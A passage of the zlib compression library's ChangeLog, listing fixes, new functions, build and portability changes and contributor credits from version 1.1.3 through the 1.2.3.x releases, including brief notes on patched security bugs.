functions from win32/zlib.def (they're not 64-bit yet) - Fix bug in void-returning vsprintf() case in gzwrite.c - Fix name change from inflate.h in contrib/inflate86/inffas86.c - Check if 
temporary file exists before removing in make_vms.com [Zinser] - Fix make install and uninstall for --static option - Fix usage of _MSC_VER in gzguts.h and zutil.h [Truta] - Update readme.txt in contrib/masmx64 and masmx86 to assemble Changes in 1.2.3.9 (21 Feb 2010) - Expunge gzio.c - Move as400 build information to old - Fix updates in contrib/minizip and contrib/vstudio - Add const to vsnprintf test in configure to avoid warnings [Weigelt] - Delete zconf.h (made by configure) [Weigelt] - Change zconf.in.h to zconf.h.in per convention [Weigelt] - Check for NULL buf in gzgets() - Return empty string for gzgets() with len == 1 (like fgets()) - Fix description of gzgets() in zlib.h for end-of-file, NULL return - Update minizip to 1.1 [Vollant] - Avoid MSVC loss of data warnings in gzread.c, gzwrite.c - Note in zlib.h that gzerror() should be used to distinguish from EOF - Remove use of snprintf() from gzlib.c - Fix bug in gzseek() - Update contrib/vstudio, adding vc9 and vc10 [Kuno, Vollant] - Fix zconf.h generation in CMakeLists.txt [Lowman] - Improve comments in zconf.h where modified by configure Changes in 1.2.3.8 (13 Feb 2010) - Clean up text files (tabs, trailing whitespace, etc.) 
[Oberhumer] - Use z_off64_t in gz_zero() and gz_skip() to match state->skip - Avoid comparison problem when sizeof(int) == sizeof(z_off64_t) - Revert to Makefile.in from 1.2.3.6 (live with the clutter) - Fix missing error return in gzflush(), add zlib.h note - Add *64 functions to zlib.map [Levin] - Fix signed/unsigned comparison in gz_comp() - Use SFLAGS when testing shared linking in configure - Add --64 option to ./configure to use -m64 with gcc - Fix ./configure --help to correctly name options - Have make fail if a test fails [Levin] - Avoid buffer overrun in contrib/masmx64/gvmat64.asm [Simpson] - Remove assembler object files from contrib Changes in 1.2.3.7 (24 Jan 2010) - Always gzopen() with O_LARGEFILE if available - Fix gzdirect() to work immediately after gzopen() or gzdopen() - Make gzdirect() more precise when the state changes while reading - Improve zlib.h documentation in many places - Catch memory allocation failure in gz_open() - Complete close operation if seek forward in gzclose_w() fails - Return Z_ERRNO from gzclose_r() if close() fails - Return Z_STREAM_ERROR instead of EOF for gzclose() being passed NULL - Return zero for gzwrite() errors to match zlib.h description - Return -1 on gzputs() error to match zlib.h description - Add zconf.in.h to allow recovery from configure modification [Weigelt] - Fix static library permissions in Makefile.in [Weigelt] - Avoid warnings in configure tests that hide functionality [Weigelt] - Add *BSD and DragonFly to Linux case in configure [gentoo 123571] - Change libzdll.a to libz.dll.a in win32/Makefile.gcc [gentoo 288212] - Avoid access of uninitialized data for first inflateReset2 call [Gomes] - Keep object files in subdirectories to reduce the clutter somewhat - Remove default Makefile and zlibdefs.h, add dummy Makefile - Add new external functions to Z_PREFIX, remove duplicates, z_z_ -> z_ - Remove zlibdefs.h completely -- modify zconf.h instead Changes in 1.2.3.6 (17 Jan 2010) - Avoid void * arithmetic 
in gzread.c and gzwrite.c - Make compilers happier with const char * for gz_error message - Avoid unused parameter warning in inflate.c - Avoid signed-unsigned comparison warning in inflate.c - Indent #pragma's for traditional C - Fix usage of strwinerror() in glib.c, change to gz_strwinerror() - Correct email address in configure for system options - Update make_vms.com and add make_vms.com to contrib/minizip [Zinser] - Update zlib.map [Brown] - Fix Makefile.in for Solaris 10 make of example64 and minizip64 [Torok] - Apply various fixes to CMakeLists.txt [Lowman] - Add checks on len in gzread() and gzwrite() - Add error message for no more room for gzungetc() - Remove zlib version check in gzwrite() - Defer compression of gzprintf() result until need to - Use snprintf() in gzdopen() if available - Remove USE_MMAP configuration determination (only used by minigzip) - Remove examples/pigz.c (available separately) - Update examples/gun.c to 1.6 Changes in 1.2.3.5 (8 Jan 2010) - Add space after #if in zutil.h for some compilers - Fix relatively harmless bug in deflate_fast() [Exarevsky] - Fix same problem in deflate_slow() - Add $(SHAREDLIBV) to LIBS in Makefile.in [Brown] - Add deflate_rle() for faster Z_RLE strategy run-length encoding - Add deflate_huff() for faster Z_HUFFMAN_ONLY encoding - Change name of "write" variable in inffast.c to avoid library collisions - Fix premature EOF from gzread() in gzio.c [Brown] - Use zlib header window size if windowBits is 0 in inflateInit2() - Remove compressBound() call in deflate.c to avoid linking compress.o - Replace use of errno in gz* with functions, support WinCE [Alves] - Provide alternative to perror() in minigzip.c for WinCE [Alves] - Don't use _vsnprintf on later versions of MSVC [Lowman] - Add CMake build script and input file [Lowman] - Update contrib/minizip to 1.1 [Svensson, Vollant] - Moved nintendods directory from contrib to root - Replace gzio.c with a new set of routines with the same functionality - Add 
gzbuffer(), gzoffset(), gzclose_r(), gzclose_w() as part of above - Update contrib/minizip to 1.1b - Change gzeof() to return 0 on error instead of -1 to agree with zlib.h Changes in 1.2.3.4 (21 Dec 2009) - Use old school .SUFFIXES in Makefile.in for FreeBSD compatibility - Update comments in configure and Makefile.in for default --shared - Fix test -z's in configure [Marquess] - Build examplesh and minigzipsh when not testing - Change NULL's to Z_NULL's in deflate.c and in comments in zlib.h - Import LDFLAGS from the environment in configure - Fix configure to populate SFLAGS with discovered CFLAGS options - Adapt make_vms.com to the new Makefile.in [Zinser] - Add zlib2ansi script for C++ compilation [Marquess] - Add _FILE_OFFSET_BITS=64 test to make test (when applicable) - Add AMD64 assembler code for longest match to contrib [Teterin] - Include options from $SFLAGS when doing $LDSHARED - Simplify 64-bit file support by introducing z_off64_t type - Make shared object files in objs directory to work around old Sun cc - Use only three-part version number for Darwin shared compiles - Add rc option to ar in Makefile.in for when ./configure not run - Add -WI,-rpath,. 
to LDFLAGS for OSF 1 V4* - Set LD_LIBRARYN32_PATH for SGI IRIX shared compile - Protect against _FILE_OFFSET_BITS being defined when compiling zlib - Rename Makefile.in targets allstatic to static and allshared to shared - Fix static and shared Makefile.in targets to be independent - Correct error return bug in gz_open() by setting state [Brown] - Put spaces before ;;'s in configure for better sh compatibility - Add pigz.c (parallel implementation of gzip) to examples/ - Correct constant in crc32.c to UL [Leventhal] - Reject negative lengths in crc32_combine() - Add inflateReset2() function to work like inflateEnd()/inflateInit2() - Include sys/types.h for _LARGEFILE64_SOURCE [Brown] - Correct typo in doc/algorithm.txt [Janik] - Fix bug in adler32_combine() [Zhu] - Catch missing-end-of-block-code error in all inflates and in puff Assures that random input to inflate eventually results in an error - Added enough.c (calculation of ENOUGH for inftrees.h) to examples/ - Update ENOUGH and its usage to reflect discovered bounds - Fix gzerror() error report on empty input file [Brown] - Add ush casts in trees.c to avoid pedantic runtime errors - Fix typo in zlib.h uncompress() description [Reiss] - Correct inflate() comments with regard to automatic header detection - Remove deprecation comment on Z_PARTIAL_FLUSH (it stays) - Put new version of gzlog (2.0) in examples with interruption recovery - Add puff compile option to permit invalid distance-too-far streams - Add puff TEST command options, ability to read piped input - Prototype the *64 functions in zlib.h when _FILE_OFFSET_BITS == 64, but _LARGEFILE64_SOURCE not defined - Fix Z_FULL_FLUSH to truly erase the past by resetting s->strstart - Fix deflateSetDictionary() to use all 32K for output consistency - Remove extraneous #define MIN_LOOKAHEAD in deflate.c (in deflate.h) - Clear bytes after deflate lookahead to avoid use of uninitialized data - Change a limit in inftrees.c to be more transparent to Coverity Prevent 
- Update win32/zlib.def with exported symbols from zlib.h - Correct spelling errors in zlib.h [Willem, Sobrado] - Allow Z_BLOCK for deflate() to force a new block - Allow negative bits in inflatePrime() to delete existing bit buffer - Add Z_TREES flush option to inflate() to return at end of trees - Add inflateMark() to return current state information for random access - Add Makefile for NintendoDS to contrib [Costa] - Add -w in configure compile tests to avoid spurious warnings [Beucler] - Fix typos in zlib.h comments for deflateSetDictionary() - Fix EOF detection in transparent gzread() [Maier] Changes in 1.2.3.3 (2 October 2006) - Make --shared the default for configure, add a --static option - Add compile option to permit invalid distance-too-far streams - Add inflateUndermine() function which is required to enable above - Remove use of "this" variable name for C++ compatibility [Marquess] - Add testing of shared library in make test, if shared library built - Use ftello() and fseeko() if available instead of ftell() and fseek() - Provide two versions of all functions that use the z_off_t type for binary compatibility -- a normal version and a 64-bit offset version, per the Large File Support Extension when _LARGEFILE64_SOURCE is defined; use the 64-bit versions by default when _FILE_OFFSET_BITS is defined to be 64 - Add a --uname= option to configure to perhaps help with cross-compiling Changes in 1.2.3.2 (3 September 2006) - Turn off silly Borland warnings [Hay] - Use off64_t and define _LARGEFILE64_SOURCE when present - Fix missing dependency on inffixed.h in Makefile.in - Rig configure --shared to build both shared and static [Teredesai, Truta] - Remove zconf.in.h and instead create a new zlibdefs.h file - Fix contrib/minizip/unzip.c non-encrypted after encrypted [Vollant] - Add treebuild.xml (see http://treebuild.metux.de/) [Weigelt] Changes in 1.2.3.1 (16 August 2006) - Add watcom directory with OpenWatcom make files [Daniel] - Remove #undef of FAR in 
zconf.in.h for MVS [Fedtke] - Update make_vms.com [Zinser] - Use -fPIC for shared build in configure [Teredesai, Nicholson] - Use only major version number for libz.so on IRIX and OSF1 [Reinholdtsen] - Use fdopen() (not _fdopen()) for Interix in zutil.h [Bäck] - Add some FAQ entries about the contrib directory - Update the MVS question in the FAQ - Avoid extraneous reads after EOF in gzio.c [Brown] - Correct spelling of "successfully" in gzio.c [Randers-Pehrson] - Add comments to zlib.h about gzerror() usage [Brown] - Set extra flags in gzip header in gzopen() like deflate() does - Make configure options more compatible with double-dash conventions [Weigelt] - Clean up compilation under Solaris SunStudio cc [Rowe, Reinholdtsen] - Fix uninstall target in Makefile.in [Truta] - Add pkgconfig support [Weigelt] - Use $(DESTDIR) macro in Makefile.in [Reinholdtsen, Weigelt] - Replace set_data_type() with a more accurate detect_data_type() in trees.c, according to the txtvsbin.txt document [Truta] - Swap the order of #include <stdio.h> and #include "zlib.h" in gzio.c, example.c and minigzip.c [Truta] - Shut up annoying VS2005 warnings about standard C deprecation [Rowe, Truta] (where?) 
- Fix target "clean" from win32/Makefile.bor [Truta] - Create .pdb and .manifest files in win32/makefile.msc [Ziegler, Rowe] - Update zlib www home address in win32/DLL_FAQ.txt [Truta] - Update contrib/masmx86/inffas32.asm for VS2005 [Vollant, Van Wassenhove] - Enable browse info in the "Debug" and "ASM Debug" configurations in the Visual C++ 6 project, and set (non-ASM) "Debug" as default [Truta] - Add pkgconfig support [Weigelt] - Add ZLIB_VER_MAJOR, ZLIB_VER_MINOR and ZLIB_VER_REVISION in zlib.h, for use in win32/zlib1.rc [Polushin, Rowe, Truta] - Add a document that explains the new text detection scheme to doc/txtvsbin.txt [Truta] - Add rfc1950.txt, rfc1951.txt and rfc1952.txt to doc/ [Truta] - Move algorithm.txt into doc/ [Truta] - Synchronize FAQ with website - Fix compressBound(), was low for some pathological cases [Fearnley] - Take into account wrapper variations in deflateBound() - Set examples/zpipe.c input and output to binary mode for Windows - Update examples/zlib_how.html with new zpipe.c (also web site) - Fix some warnings in examples/gzlog.c and examples/zran.c (it seems that gcc became pickier in 4.0) - Add zlib.map for Linux: "All symbols from zlib-1.1.4 remain un-versioned, the patch adds versioning only for symbols introduced in zlib-1.2.0 or later. It also declares as local those symbols which are not designed to be exported." 
[Levin] - Update Z_PREFIX list in zconf.in.h, add --zprefix option to configure - Do not initialize global static by default in trees.c, add a response NO_INIT_GLOBAL_POINTERS to initialize them if needed [Marquess] - Don't use strerror() in gzio.c under WinCE [Yakimov] - Don't use errno.h in zutil.h under WinCE [Yakimov] - Move arguments for AR to its usage to allow replacing ar [Marot] - Add HAVE_VISIBILITY_PRAGMA in zconf.in.h for Mozilla [Randers-Pehrson] - Improve inflateInit() and inflateInit2() documentation - Fix structure size comment in inflate.h - Change configure help option from --h* to --help [Santos] Changes in 1.2.3 (18 July 2005) - Apply security vulnerability fixes to contrib/infback9 as well - Clean up some text files (carriage returns, trailing space) - Update testzlib, vstudio, masmx64, and masmx86 in contrib [Vollant] Changes in 1.2.2.4 (11 July 2005) - Add inflatePrime() function for starting inflation at bit boundary - Avoid some Visual C warnings in deflate.c - Avoid more silly Visual C warnings in inflate.c and inftrees.c for 64-bit compile - Fix some spelling errors in comments [Betts] - Correct inflateInit2() error return documentation in zlib.h - Add zran.c example of compressed data random access to examples directory, shows use of inflatePrime() - Fix cast for assignments to strm->state in inflate.c and infback.c - Fix zlibCompileFlags() in zutil.c to use 1L for long shifts [Oberhumer] - Move declarations of gf2 functions to right place in crc32.c [Oberhumer] - Add cast in trees.c to avoid a warning [Oberhumer] - Avoid some warnings in fitblk.c, gun.c, gzjoin.c in examples [Oberhumer] - Update make_vms.com [Zinser] - Initialize state->write in inflateReset() since copied in inflate_fast() - Be more strict on incomplete code sets in inflate_table() and increase ENOUGH and MAXD -- this repairs a possible security vulnerability for invalid inflate input. 
Thanks to Tavis Ormandy and Markus Oberhumer for discovering the vulnerability and providing test cases - Add ia64 support to configure for HP-UX [Smith] - Add error return to gzread() for format or i/o error [Levin] - Use malloc.h for OS/2 [Necasek] Changes in 1.2.2.3 (27 May 2005) - Replace 1U constants in inflate.c and inftrees.c for 64-bit compile - Typecast fread() return values in gzio.c [Vollant] - Remove trailing space in minigzip.c outmode (VC++ can't deal with it) - Fix crc check bug in gzread() after gzungetc() [Heiner] - Add the deflateTune() function to adjust internal compression parameters - Add a fast gzip decompressor, gun.c, to examples (use of inflateBack) - Remove an incorrect assertion in examples/zpipe.c - Add C++ wrapper in infback9.h [Donais] - Fix bug in inflateCopy() when decoding fixed codes - Note in zlib.h how much deflateSetDictionary() actually uses - Remove USE_DICT_HEAD in deflate.c (would mess up inflate if used) - Add _WIN32_WCE to define WIN32 in zconf.in.h [Spencer] - Don't include stderr.h or errno.h for _WIN32_WCE in zutil.h [Spencer] - Add gzdirect() function to indicate transparent reads - Update contrib/minizip [Vollant] - Fix compilation of deflate.c when both ASMV and FASTEST [Oberhumer] - Add casts in crc32.c to avoid warnings [Oberhumer] - Add contrib/masmx64 [Vollant] - Update contrib/asm586, asm686, masmx86, testzlib, vstudio [Vollant] Changes in 1.2.2.2 (30 December 2004) - Replace structure assignments in deflate.c and inflate.c with zmemcpy to avoid implicit memcpy calls (portability for no-library compilation) - Increase sprintf() buffer size in gzdopen() to allow for large numbers - Add INFLATE_STRICT to check distances against zlib header - Improve WinCE errno handling and comments [Chang] - Remove comment about no gzip header processing in FAQ - Add Z_FIXED strategy option to deflateInit2() to force fixed trees - Add updated make_vms.com [Coghlan], update README - Create a new "examples" directory, move 
gzappend.c there, add zpipe.c, fitblk.c, gzlog.[ch], gzjoin.c, and zlib_how.html - Add FAQ entry and comments in deflate.c on uninitialized memory access - Add Solaris 9 make options in configure [Gilbert] - Allow strerror() usage in gzio.c for STDC - Fix DecompressBuf in contrib/delphi/ZLib.pas [ManChesTer] - Update contrib/masmx86/inffas32.asm and gvmat32.asm [Vollant] - Use z_off_t for adler32_combine() and crc32_combine() lengths - Make adler32() much faster for small len - Use OS_CODE in deflate() default gzip header Changes in 1.2.2.1 (31 October 2004) - Allow inflateSetDictionary() call for raw inflate - Fix inflate header crc check bug for file names and comments - Add deflateSetHeader() and gz_header structure for custom gzip headers - Add inflateGetheader() to retrieve gzip headers - Add crc32_combine() and adler32_combine() functions - Add alloc_func, free_func, in_func, out_func to Z_PREFIX list - Use zstreamp consistently in zlib.h (inflate_back functions) - Remove GUNZIP condition from definition of inflate_mode in inflate.h and in contrib/inflate86/inffast.S [Truta, Anderson] - Add support for AMD64 in contrib/inflate86/inffas86.c [Anderson] - Update projects/README.projects and projects/visualc6 [Truta] - Update win32/DLL_FAQ.txt [Truta] - Avoid warning under NO_GZCOMPRESS in gzio.c; fix typo [Truta] - Deprecate Z_ASCII; use Z_TEXT instead [Truta] - Use a new algorithm for setting strm->data_type in trees.c [Truta] - Do not define an exit() prototype in zutil.c unless DEBUG defined - Remove prototype of exit() from zutil.c, example.c, minigzip.c [Truta] - Add comment in zlib.h for Z_NO_FLUSH parameter to deflate() - Fix Darwin build version identification [Peterson] Changes in 1.2.2 (3 October 2004) - Update zlib.h comments on gzip in-memory processing - Set adler to 1 in inflateReset() to support Java test suite [Walles] - Add contrib/dotzlib [Ravn] - Update win32/DLL_FAQ.txt [Truta] - Update contrib/minizip [Vollant] - Move 
contrib/visual-basic.txt to old/ [Truta] - Fix assembler builds in projects/visualc6/ [Truta] Changes in 1.2.1.2 (9 September 2004) - Update INDEX file - Fix trees.c to update strm->data_type (no one ever noticed!) - Fix bug in error case in inflate.c, infback.c, and infback9.c [Brown] - Add "volatile" to crc table flag declaration (for DYNAMIC_CRC_TABLE) - Add limited multitasking protection to DYNAMIC_CRC_TABLE - Add NO_vsnprintf for VMS in zutil.h [Mozilla] - Don't declare strerror() under VMS [Mozilla] - Add comment to DYNAMIC_CRC_TABLE to use get_crc_table() to initialize - Update contrib/ada [Anisimkov] - Update contrib/minizip [Vollant] - Fix configure to not hardcode directories for Darwin [Peterson] - Fix gzio.c to not return error on empty files [Brown] - Fix indentation; update version in contrib/delphi/ZLib.pas and contrib/pascal/zlibpas.pas [Truta] - Update mkasm.bat in contrib/masmx86 [Truta] - Update contrib/untgz [Truta] - Add projects/README.projects [Truta] - Add project for MS Visual C++ 6.0 in projects/visualc6 [Cadieux, Truta] - Update win32/DLL_FAQ.txt [Truta] - Update list of Z_PREFIX symbols in zconf.h [Randers-Pehrson, Truta] - Remove an unnecessary assignment to curr in inftrees.c [Truta] - Add OS/2 to exe builds in configure [Poltorak] - Remove err dummy parameter in zlib.h [Kientzle] Changes in 1.2.1.1 (9 January 2004) - Update email address in README - Several FAQ updates - Fix a big fat bug in inftrees.c that prevented decoding valid dynamic blocks with only literals and no distance codes -- Thanks to "Hot Emu" for the bug report and sample file - Add a note to puff.c on no distance codes case Changes in 1.2.1 (17 November 2003) - Remove a tab in contrib/gzappend/gzappend.c - Update some interfaces in contrib for new zlib functions - Update zlib version number in some contrib entries - Add Windows CE definition for ptrdiff_t in zutil.h [Mai, Truta] - Support shared libraries on Hurd and KFreeBSD [Brown] - Fix error in NO_DIVIDE option 
of adler32.c Changes in 1.2.0.8 (4 November 2003) - Update version in contrib/delphi/ZLib.pas and contrib/pascal/zlibpas.pas - Add experimental NO_DIVIDE #define in adler32.c - Possibly faster on some processors (let me know if it is) - Correct Z_BLOCK to not return on first inflate call if no wrap - Fix strm->data_type on inflate() return to correctly indicate EOB - Add deflatePrime() function for appending in the middle of a byte - Add contrib/gzappend for an example of appending to a stream - Update win32/DLL_FAQ.txt [Truta] - Delete Turbo C comment in README [Truta] - Improve some indentation in zconf.h [Truta] - Fix infinite loop on bad input in configure script [Church] - Fix gzeof() for concatenated gzip files [Johnson] - Add example to contrib/visual-basic.txt [Michael B.] - Add -p to mkdir's in Makefile.in [vda] - Fix configure to properly detect presence or lack of printf functions - Add AS400 support [Monnerat] - Add a little Cygwin support [Wilson] Changes in 1.2.0.7 (21 September 2003) - Correct some debug formats in contrib/infback9 - Cast a type in a debug statement in trees.c - Change search and replace delimiter in configure from % to # [Beebe] - Update contrib/untgz to 0.2 with various fixes [Truta] - Add build support for Amiga [Nikl] - Remove some directories in old that have been updated to 1.2 - Add dylib building for Mac OS X in configure and Makefile.in - Remove old distribution stuff from Makefile - Update README to point to DLL_FAQ.txt, and add comment on Mac OS X - Update links in README Changes in 1.2.0.6 (13 September 2003) - Minor FAQ updates - Update contrib/minizip to 1.00 [Vollant] - Remove test of gz functions in example.c when GZ_COMPRESS defined [Truta] - Update POSTINC comment for 68060 [Nikl] - Add contrib/infback9 with deflate64 decoding (unsupported) - For MVS define NO_vsnprintf and undefine FAR [van Burik] - Add pragma for fdopen on MVS [van Burik] Changes in 1.2.0.5 (8 September 2003) - Add OF to inflateBackEnd() 
declaration in zlib.h - Remember start when using gzdopen in the middle of a file - Use internal off_t counters in gz* functions to properly handle seeks - Perform more rigorous check for distance-too-far in inffast.c - Add Z_BLOCK flush option to return from inflate at block boundary - Set strm->data_type on return from inflate - Indicate bits unused, if at block boundary, and if in last block - Replace size_t with ptrdiff_t in crc32.c, and check for correct size - Add condition so old NO_DEFLATE define still works for compatibility - FAQ update regarding the Windows DLL [Truta] - INDEX update: add qnx entry, remove aix entry [Truta] - Install zlib.3 into mandir [Wilson] - Move contrib/zlib_dll_FAQ.txt to win32/DLL_FAQ.txt; update [Truta] - Adapt the zlib interface to the new DLL convention guidelines [Truta] - Introduce ZLIB_WINAPI macro to allow the export of functions using the WINAPI calling convention, for Visual Basic [Vollant, Truta] - Update msdos and win32 scripts and makefiles [Truta] - Export symbols by name, not by ordinal, in win32/zlib.def [Truta] - Add contrib/ada [Anisimkov] - Move asm files from contrib/vstudio/vc70_32 to contrib/asm386 [Truta] - Rename contrib/asm386 to contrib/masmx86 [Truta, Vollant] - Add contrib/masm686 [Truta] - Fix offsets in contrib/inflate86 and contrib/masmx86/inffas32.asm [Truta, Vollant] - Update contrib/delphi; rename to contrib/pascal; add example [Truta] - Remove contrib/delphi2; add a new contrib/delphi [Truta] - Avoid inclusion of the nonstandard in contrib/iostream, and fix some method prototypes [Truta] - Fix the ZCR_SEED2 constant to avoid warnings in contrib/minizip [Truta] - Avoid the use of backslash (\) in contrib/minizip [Vollant] - Fix file time handling in contrib/untgz; update makefiles [Truta] - Update contrib/vstudio/vc70_32 to comply with the new DLL guidelines [Vollant] - Remove contrib/vstudio/vc15_16 [Vollant] - Rename contrib/vstudio/vc70_32 to contrib/vstudio/vc7 [Truta] - Update README.contrib 
[Truta] - Invert the assignment order of match_head and s->prev[...] in INSERT_STRING [Truta] - Compare TOO_FAR with 32767 instead of 32768, to avoid 16-bit warnings [Truta] - Compare function pointers with 0, not with NULL or Z_NULL [Truta] - Fix prototype of syncsearch in inflate.c [Truta] - Introduce ASMINF macro to be enabled when using an ASM implementation of inflate_fast [Truta] - Change NO_DEFLATE to NO_GZCOMPRESS [Truta] - Modify test_gzio in example.c to take a single file name as a parameter [Truta] - Exit the example.c program if gzopen fails [Truta] - Add type casts around strlen in example.c [Truta] - Remove casting to sizeof in minigzip.c; give a proper type to the variable compared with SUFFIX_LEN [Truta] - Update definitions of STDC and STDC99 in zconf.h [Truta] - Synchronize zconf.h with the new Windows DLL interface [Truta] - Use SYS16BIT instead of __32BIT__ to distinguish between 16- and 32-bit platforms [Truta] - Use far memory allocators in small 16-bit memory models for Turbo C [Truta] - Add info about the use of ASMV, ASMINF and ZLIB_WINAPI in zlibCompileFlags [Truta] - Cygwin has vsnprintf [Wilson] - In Windows16, OS_CODE is 0, as in MSDOS [Truta] - In Cygwin, OS_CODE is 3 (Unix), not 11 (Windows32) [Wilson] Changes in 1.2.0.4 (10 August 2003) - Minor FAQ updates - Be more strict when checking inflateInit2's windowBits parameter - Change NO_GUNZIP compile option to NO_GZIP to cover deflate as well - Add gzip wrapper option to deflateInit2 using windowBits - Add updated QNX rule in configure and qnx directory [Bonnefoy] - Make inflate distance-too-far checks more rigorous - Clean up FAR usage in inflate - Add casting to sizeof() in gzio.c and minigzip.c Changes in 1.2.0.3 (19 July 2003) - Fix silly error in gzungetc() implementation [Vollant] - Update contrib/minizip and contrib/vstudio [Vollant] - Fix printf format in example.c - Correct cdecl support in zconf.in.h [Anisimkov] - Minor FAQ updates Changes in 1.2.0.2 (13 July 2003) - Add 
ZLIB_VERNUM in zlib.h for numerical preprocessor comparisons - Attempt to avoid warnings in crc32.c for pointer-int conversion - Add AIX to configure, remove aix directory [Bakker] - Add some casts to minigzip.c - Improve checking after insecure sprintf() or vsprintf() calls - Remove #elif's from crc32.c - Change leave label to inf_leave in inflate.c and infback.c to avoid library conflicts - Remove inflate gzip decoding by default--only enable gzip decoding by special request for stricter backward compatibility - Add zlibCompileFlags() function to return compilation information - More typecasting in deflate.c to avoid warnings - Remove leading underscore from _Capital #defines [Truta] - Fix configure to link shared library when testing - Add some Windows CE target adjustments [Mai] - Remove #define ZLIB_DLL in zconf.h [Vollant] - Add zlib.3 [Rodgers] - Update RFC URL in deflate.c and algorithm.txt [Mai] - Add zlib_dll_FAQ.txt to contrib [Truta] - Add UL to some constants [Truta] - Update minizip and vstudio [Vollant] - Remove vestigial NEED_DUMMY_RETURN from zconf.in.h - Expand use of NO_DUMMY_DECL to avoid all dummy structures - Added iostream3 to contrib [Schwardt] - Replace rewind() with fseek() for WinCE [Truta] - Improve setting of zlib format compression level flags - Report 0 for huffman and rle strategies and for level == 0 or 1 - Report 2 only for level == 6 - Only deal with 64K limit when necessary at compile time [Truta] - Allow TOO_FAR check to be turned off at compile time [Truta] - Add gzclearerr() function [Souza] - Add gzungetc() function Changes in 1.2.0.1 (17 March 2003) - Add Z_RLE strategy for run-length encoding [Truta] - When Z_RLE requested, restrict matches to distance one - Update zlib.h, minigzip.c, gzopen(), gzdopen() for Z_RLE - Correct FASTEST compilation to allow level == 0 - Clean up what gets compiled for FASTEST - Incorporate changes to zconf.in.h [Vollant] - Refine detection of Turbo C need for dummy returns - Refine ZLIB_DLL 
compilation - Include additional header file on VMS for off_t typedef - Try to use _vsnprintf where it supplants vsprintf [Vollant] - Add some casts in inffast.c - Enhance comments in zlib.h on what happens if gzprintf() tries to write more than 4095 bytes before compression - Remove unused state from inflateBackEnd() - Remove exit(0) from minigzip.c, example.c - Get rid of all those darn tabs - Add "check" target to Makefile.in that does the same thing as "test" - Add "mostlyclean" and "maintainer-clean" targets to Makefile.in - Update contrib/inflate86 [Anderson] - Update contrib/testzlib, contrib/vstudio, contrib/minizip [Vollant] - Add msdos and win32 directories with makefiles [Truta] - More additions and improvements to the FAQ Changes in 1.2.0 (9 March 2003) - New and improved inflate code - About 20% faster - Does not allocate 32K window unless and until needed - Automatically detects and decompresses gzip streams - Raw inflate no longer needs an extra dummy byte at end - Added inflateBack functions using a callback interface--even faster than inflate, useful for file utilities (gzip, zip) - Added inflateCopy() function to record state for random access on externally generated deflate streams (e.g. 
in gzip files) - More readable code (I hope) - New and improved crc32() - About 50% faster, thanks to suggestions from Rodney Brown - Add deflateBound() and compressBound() functions - Fix memory leak in deflateInit2() - Permit setting dictionary for raw deflate (for parallel deflate) - Fix const declaration for gzwrite() - Check for some malloc() failures in gzio.c - Fix bug in gzopen() on single-byte file 0x1f - Fix bug in gzread() on concatenated file with 0x1f at end of buffer and next buffer doesn't start with 0x8b - Fix uncompress() to return Z_DATA_ERROR on truncated input - Free memory at end of example.c - Remove MAX #define in trees.c (conflicted with some libraries) - Fix static const's in deflate.c, gzio.c, and zutil.[ch] - Declare malloc() and free() in gzio.c if STDC not defined - Use malloc() instead of calloc() in zutil.c if int big enough - Define STDC for AIX - Add aix/ with approach for compiling shared library on AIX - Add HP-UX support for shared libraries in configure - Add OpenUNIX support for shared libraries in configure - Use $cc instead of gcc to build shared library - Make prefix directory if needed when installing - Correct Macintosh avoidance of typedef Byte in zconf.h - Correct Turbo C memory allocation when under Linux - Use libz.a instead of -lz in Makefile (assure use of compiled library) - Update configure to check for snprintf or vsnprintf functions and their return value, warn during make if using an insecure function - Fix configure problem with compile-time knowledge of HAVE_UNISTD_H that is lost when library is used--resolution is to build new zconf.h - Documentation improvements (in zlib.h): - Document raw deflate and inflate - Update RFCs URL - Point out that zlib and gzip formats are different - Note that Z_BUF_ERROR is not fatal - Document string limit for gzprintf() and possible buffer overflow - Note requirement on avail_out when flushing - Note permitted values of flush parameter of inflate() - Add some FAQs (and even 
answers) to the FAQ - Add contrib/inflate86/ for x86 faster inflate - Add contrib/blast/ for PKWare Data Compression Library decompression - Add contrib/puff/ simple inflate for deflate format description Changes in 1.1.4 (11 March 2002) - ZFREE was repeated on same allocation (a double free) on some error conditions. This creates a security problem described in http://www.zlib.org/advisory-2002-03-11.txt - Returned incorrect error (Z_MEM_ERROR) on some invalid data - Avoid accesses before window for invalid distances with inflate window less than 32K - force windowBits > 8 to avoid a bug in the encoder for a window size of 256 bytes. (A complete fix will be available in 1.1.5) Changes in 1.1.3 (9 July 1998) - fix "an inflate input buffer bug that shows up on rare but persistent occasions" (Mark) - fix gzread and gztell for concatenated .gz files (Didier Le Botlan) - fix gzseek(..., SEEK_SET) in write mode - fix crc check after a gzseek (Frank Faubert) - fix miniunzip when the last entry in a zip file is itself a zip file (J Lillge) - add contrib/asm586 and contrib/asm686 (Brian Raiter) See http://www.muppetlabs.com/~breadbox/software/assembly.html - add support for Delphi 3 in contrib/delphi (Bob Dellaca) - add support for C++Builder 3 and Delphi 3 in contrib/delphi2 (Davide Moretti) - do not exit prematurely in untgz if 0 at start of block (Magnus Holmgren) - use macro EXTERN instead of extern to support DLL for BeOS (Sander Stoks) - added a FAQ file - Support gzdopen on Mac with Metrowerks (Jason Linhart) - Do not redefine Byte on Mac (Brad Pettit & Jason Linhart) - define SEEK_END too if SEEK_SET is not defined (Albert Chin-A-Young) - avoid some warnings with Borland C (Tom Tanner) - fix a problem in contrib/minizip/zip.c for 16-bit MSDOS (Gilles Vollant) - emulate utime() for WIN32 in contrib/untgz (Gilles Vollant) - allow several arguments to configure (Tim Mooney, Frodo Looijaard) - use libdir and includedir in Makefile.in (Tim Mooney) - support shared libraries on OSF1 V4
(Tim Mooney) - remove so_locations in "make clean" (Tim Mooney) - fix maketree.c compilation error (Glenn, Mark) - Python interface to zlib now in Python 1.5 (Jeremy Hylton) - new Makefile.riscos (Rich Walker) - initialize static descriptors in trees.c for embedded targets (Nick Smith) - use "foo-gz" in example.c for RISCOS and VMS (Nick Smith) - add the OS/2 files in Makefile.in too (Andrew Zabolotny) - fix fdopen and halloc macros for Microsoft C 6.0 (Tom Lane) - fix maketree.c to allow clean compilation of inffixed.h (Mark) - fix parameter check in deflateCopy (Gunther Nikl) - cleanup trees.c, use compressed_len only in debug mode (Christian Spieler) - Many portability patches by Christian Spieler: . zutil.c, zutil.h: added "const" for zmem* . Make_vms.com: fixed some typos . Make_vms.com: msdos/Makefile.*: removed zutil.h from some dependency lists . msdos/Makefile.msc: remove "default rtl link library" info from obj files . msdos/Makefile.*: use model-dependent name for the built zlib library . 
